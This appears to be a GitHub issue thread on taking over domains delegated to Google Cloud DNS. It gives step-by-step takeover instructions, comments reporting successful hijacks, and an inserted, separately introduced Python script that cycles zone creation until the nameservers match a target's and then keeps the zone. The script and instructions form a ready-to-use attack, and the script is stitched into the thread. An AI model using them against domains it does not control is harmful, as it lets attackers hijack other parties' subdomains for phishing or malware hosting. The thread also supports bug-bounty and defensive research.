Google Cloud DNS
libertalialtd opened this issue · 14 comments
Service
Google Cloud DNS
Status
Vulnerable (as of July 2023)
Nameserver
ns-cloud-**.googledomains.com
Explanation
If a domain points to one of the nameservers listed above it is using Google Cloud DNS, a free service. A SERVFAIL error indicates the domain is vulnerable to takeover. To perform the takeover, set up a free Google Cloud account, then navigate to Cloud DNS. Click Create Zone and then enter the (sub)domain name in the field named DNS name. Your new zone will be given four random Google nameservers. These must match the ones on the vulnerable domain. If they do not match, simply delete the zone and create another one; you should be assigned a different random set of Google nameservers. It can take a few attempts to get them to match.
Errors / Issues
- If you get an error about domain verification then the domain is not vulnerable.
- There have been multiple comments that this may be patched; this needs to be investigated further and I haven't had time yet.
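The create/compare/delete loop described in the Explanation above, written out as an added example (this is not code from the issue, from the repository, or from the GCPShardJuggler tool linked further down). It assumes the gcloud CLI is installed and authenticated against a project you control, that you have already confirmed the SERVFAIL condition and captured the target's NS records with `dig NS`, and that the `shard-<timestamp>-<n>` zone naming is an arbitrary choice. The shard logic relies on one property the thread relies on too: each Cloud DNS zone gets four nameservers `ns-cloud-<letter>1..4.googledomains.com` that share a single letter, so the letter is what has to match.

```python
#!/usr/bin/env python3
"""Cycle Cloud DNS zone creation until the assigned nameserver set matches the target's.

usage: python3 shard_juggle.py PROJECT sub.example.com ns-cloud-c1.googledomains.com ... (from `dig NS`)
"""
import json
import re
import subprocess
import sys
import time
from typing import Optional

# Cloud DNS public nameservers look like ns-cloud-<letter><1-4>.googledomains.com;
# the four servers of one zone share the letter (the "shard") and differ only in the digit.
_NS_RE = re.compile(r"^ns-cloud-([a-z])(\d)\.googledomains\.com\.?$", re.IGNORECASE)


def shard_of(nameserver: str) -> Optional[str]:
    """Return the shard letter ('a'..'e') of a Cloud DNS nameserver, or None if it is not one."""
    m = _NS_RE.match(nameserver.strip())
    return m.group(1).lower() if m else None


def normalize(nameservers) -> frozenset:
    """Lower-case, strip trailing dots, and drop anything that is not a Cloud DNS nameserver."""
    return frozenset(ns.strip().lower().rstrip(".") for ns in nameservers if shard_of(ns))


def target_shard(target_ns) -> str:
    """The single shard letter the target delegates to; raises if the NS set is mixed or not Cloud DNS."""
    letters = {shard_of(ns) for ns in target_ns}
    letters.discard(None)
    if len(letters) != 1:
        raise ValueError(f"target NS set is not a single Cloud DNS shard: {sorted(target_ns)}")
    return letters.pop()


def zone_matches(target_ns, zone_ns) -> bool:
    """True when the zone Cloud DNS handed us is exactly the four-server set the target points to."""
    want = normalize(target_ns)
    return len(want) == 4 and normalize(zone_ns) == want


def gcloud(*args):
    """Run a gcloud command non-interactively and return (returncode, stdout, stderr)."""
    p = subprocess.run(["gcloud", *args, "--quiet"], capture_output=True, text=True)
    return p.returncode, p.stdout, p.stderr


def juggle(dns_name, target_ns, project, max_attempts=200, zone_prefix="shard"):
    """Create/describe/delete zones until the assigned NS set matches target_ns.

    Returns the name of the matching zone (left in place), or None if no match
    appeared within max_attempts or the domain turned out to need verification.
    """
    want = target_shard(target_ns)
    for attempt in range(1, max_attempts + 1):
        zone = f"{zone_prefix}-{int(time.time())}-{attempt}"  # arbitrary, hypothetical naming
        rc, _, err = gcloud("dns", "managed-zones", "create", zone,
                            f"--dns-name={dns_name.rstrip('.')}.",
                            "--description=takeover check", f"--project={project}")
        if rc != 0:
            if "verif" in err.lower():
                # Cloud DNS demanding domain verification means the name is not claimable (see Errors / Issues).
                print(f"domain verification required, {dns_name} is not vulnerable", file=sys.stderr)
                return None
            raise RuntimeError(err.strip())
        _, out, _ = gcloud("dns", "managed-zones", "describe", zone,
                           "--format=json", f"--project={project}")
        got = json.loads(out)["nameServers"]
        if zone_matches(target_ns, got):
            print(f"attempt {attempt}: zone {zone} landed on shard {want}: {sorted(got)}")
            return zone
        print(f"attempt {attempt}: got shard {shard_of(got[0])}, wanted {want}; deleting", file=sys.stderr)
        # A freshly created zone holds only its SOA and NS records, so delete succeeds without clearing anything.
        gcloud("dns", "managed-zones", "delete", zone, f"--project={project}")
    return None


if __name__ == "__main__":
    if len(sys.argv) < 4:
        sys.exit(__doc__)
    print(juggle(dns_name=sys.argv[2], target_ns=sys.argv[3:], project=sys.argv[1]))
```

Run it with the project ID, the (sub)domain, and the four NS records you pulled from the target's delegation; it stops as soon as a zone lands on the right shard and leaves that zone in place for you to populate. Every non-matching zone is deleted before the next attempt, which also sidesteps the "delete all records first" confusion raised later in the thread, since a zone that has only ever held its SOA and NS records deletes cleanly.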
Is reaching the a* ns server impossible now?
I've tried about 70 times. Only getting b* - e*.
@indianajson Can ns-gcp-private.googledomains.com be taken over?
@molitona I am not sure about this, though the "GC" stands for "Google Cloud" and it may be only for internal testing.
@b1bek This means the parent domain is already taken, so all subdomains of this domain should not be vulnerable.
I just found a subdomain where the zone can be created. But I also have the problem that I do not get the needed letter "c" in the NS servers. So I think Google has some mitigation in place similar to AWS, where you cannot get the same NS when they were previously used.
Yeah, which tool are you using btw?
Ah, that's just a "hacky" bash script I created which uses the gcloud CLI @b1bek .
Just pushed it on Github you can check it out:
https://github.com/RogueSMG/GCPShardJuggler
Thanks for the tool @RogueSMG , just confirmed it is still vulnerable. Got the expected shards after 75 tries plus a few manual creations. Got all of c1, d1, e1 and finally b1.
Thanks for the tool @RogueSMG , just confirmed it is still vulnerable. Got the expected shards after ~70 tries
Thanks for verifying this is still vulnerable as of July 2023.
I was trying to hit e1 shards. After more than 4000 attempts I never got them, only a1, b1, c1, d1. I'll keep looking into it.
Are you sure this still works? Google DNS doesn't let you delete a zone unless you delete all the records in it first. Maybe I'm just being dumb here but idk.
From the docs: https://cloud.google.com/dns/quotas#name-server-limits
Doesn't this effectively make DNS takeover on GCP an edge-case?
From the docs: https://cloud.google.com/dns/quotas#name-server-limits
Doesn't this effectively make DNS takeover on GCP an edge-case?
Yes, most GCP takeovers are edge-cases. It's also possible "in theory" to take over a subdomain via dangling A records if the DNS record is pointing to an ephemerally assigned GCP-owned IP address. Once that IP gets released back into the GCP ephemeral IP pool, you "in theory" can take it over by generating VM instances over and over until you get assigned the IP that is still in the target's DNS panel in the Google Cloud Platform management panel. It's very difficult. I wrote some scripts to do this. But I have yet to "prove" that it actually works.
Interesting, I've just been doing the same in AWS but I'm approaching it from the angle of looking at what traffic I get for an Elastic IP and seeing if the Host header is a valid domain, then working backwards from that. Happy to collab if you are still working on this.